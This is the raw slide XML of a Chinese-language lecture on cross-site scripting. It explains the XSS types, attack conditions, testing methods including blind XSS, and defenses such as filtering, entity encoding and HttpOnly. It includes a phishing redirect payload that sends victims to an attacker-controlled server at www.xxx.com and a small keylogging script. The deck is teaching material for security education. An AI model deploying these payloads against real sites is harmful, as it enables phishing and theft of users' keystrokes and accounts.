        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="1219200"/>
            <a:ext cx="4038600" cy="5635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dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将页面内容定位到指定位置，可以实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>页面跳转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6058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网络钓鱼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攻击者构造如下跨站代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/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&lt;script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="http://www.xxx.com/auth.php?id=yvceb3&amp;info=input+your+account"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://www.xxx.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是攻击者自己的服务器，攻击者提前写好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>auth.php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40622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窃取客户端信息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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本，攻击者可以获取用户浏览器访问记录、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址、开放端口、剪贴板内容、按键记录等许多敏感信息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pPr marL="400050" lvl="1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keyDown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pPr marL="400050" lvl="1" indent="0">
              <a:buNone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realkey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String.fromCharCode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event.keyCode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alert(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realkey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);}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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document.onkeydown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keyDown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D3AE7-9FAB-45D2-91EC-48A7B79793D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="4038600"/>
            <a:ext cx="38862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dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>event.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对应的值就是键盘上每个键的代码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256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漏洞的标准防护方法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过滤特殊字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript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空字符、特殊字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用实体化编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/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实体化编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cookie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7938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3D26B2-4EE9-40F2-AE79-73D6A88BD7C8}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" sz="100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2022/6/11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BB6269-7DE0-47D4-888D-AFC4FACD8116}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b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课程内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6149" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451225" y="2447925"/>
            <a:ext cx="5311775" cy="688975"/>
            <a:chOff x="720" y="1392"/>
            <a:chExt cx="4058" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25395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6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5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5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0" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451225" y="3313113"/>
            <a:ext cx="5311775" cy="688975"/>
            <a:chOff x="720" y="1392"/>
            <a:chExt cx="4058" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25396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2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3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4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3451225" y="4170363"/>
            <a:ext cx="5311775" cy="688975"/>
            <a:chOff x="720" y="1392"/>
            <a:chExt cx="4058" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6177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8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2" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451225" y="1604963"/>
            <a:ext cx="5311775" cy="688975"/>
            <a:chOff x="720" y="1392"/>
            <a:chExt cx="4058" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253971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74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73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74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53" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3917950" y="169862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XSS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攻击原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6154" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3929063" y="25558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XSS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攻击的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6155" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3929063" y="34147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XSS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攻击的条件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6156" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3962400" y="426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利用方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61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76600" y="4156075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32877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24368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55963" y="1600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Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3581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62" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3576638" y="167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63" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3589338" y="25352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64" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3589338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6165" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="5029200"/>
            <a:ext cx="5311775" cy="688975"/>
            <a:chOff x="720" y="1392"/>
            <a:chExt cx="4058" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6169" name="AutoShape 36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0" name="Group 37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90" name="AutoShape 38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91" name="AutoShape 39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66" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3581400" y="510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6167" name="Picture 41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46438" y="5029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8" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3962400" y="51054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防护手段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攻击的原理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10591800" cy="5105400"/>
          </a:xfrm>
        </p:spPr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攻击叫做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击，英文全称是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross Site Scripting,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原本缩写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但是为了和层叠样式表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cascading Style Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）区别，简写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要影响用户端的安全，包含用户信息安全、权限安全等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本质上，是将恶意脚本嵌入到当前网页中并（供其他用户）执行的攻击方式。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通常通过“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入”行为篡改网页，并插入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用用户身份在输入参数时附带恶意脚本，提交服务器之后，服务器并没有做任何安全过滤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683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举例：评价功能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4572000" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户输入评论（评论处为攻击代码）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器接收到评论并存储（入库存储）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前台自动调用评论</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>任何人触发评论（直接看到攻击代码）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击成功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262" y="1219200"/>
            <a:ext cx="50958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675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攻击的分类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935421"/>
            <a:ext cx="10287000" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>反射型跨站攻击（构造恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL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只是将用户输入的数据通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的形式直接或未经安全过滤就在浏览器中进行输出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>诱骗用户点击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器交互</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存储型跨站攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户输入的数据信息保存在服务器的数据库或文件中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户访问就会触发，有较强的稳定性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据库交互</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>型跨站攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>也算某种反射型，有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>节点编程改变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器交互</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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774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攻击的条件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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>型跨站攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器接收到数据，并原样返回给用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器没有存储，无法持久化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>仅针对当次请求有效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>借助钓鱼、垃圾邮件等手段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存储型跨站攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器端已存储恶意脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>持久性强，危害性大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本课程重点分析的对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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9700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攻击成功的条件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入库处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标网页有攻击者可控的输入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入信息可以在受害者的浏览器中显示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入具备功能的可执行脚本，并绕过防护措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出库处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器打开被污染的页面，作为输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器将输入解析为脚本，并具备执行该脚本的能力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8047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漏洞测试的思路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寻找输入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一般发生在留言板、在线信箱。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试输出位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要在用户页面上进行展示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于一些不常见的系统，可以通过在回显页面进行搜索</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有些输入点无法显示，需要“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲打后台”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试基本跨站代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>已发现具体的输入点和输出位置，需要测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经典方式就是“弹窗测试”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9C2D57-57A4-4071-A7DF-F4475A681102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="508298"/>
            <a:ext cx="3276600" cy="23693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dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲打后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>其实和存储型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>原理是一样的，不同的地方在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>盲打的结果你看不到，你不知道它是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
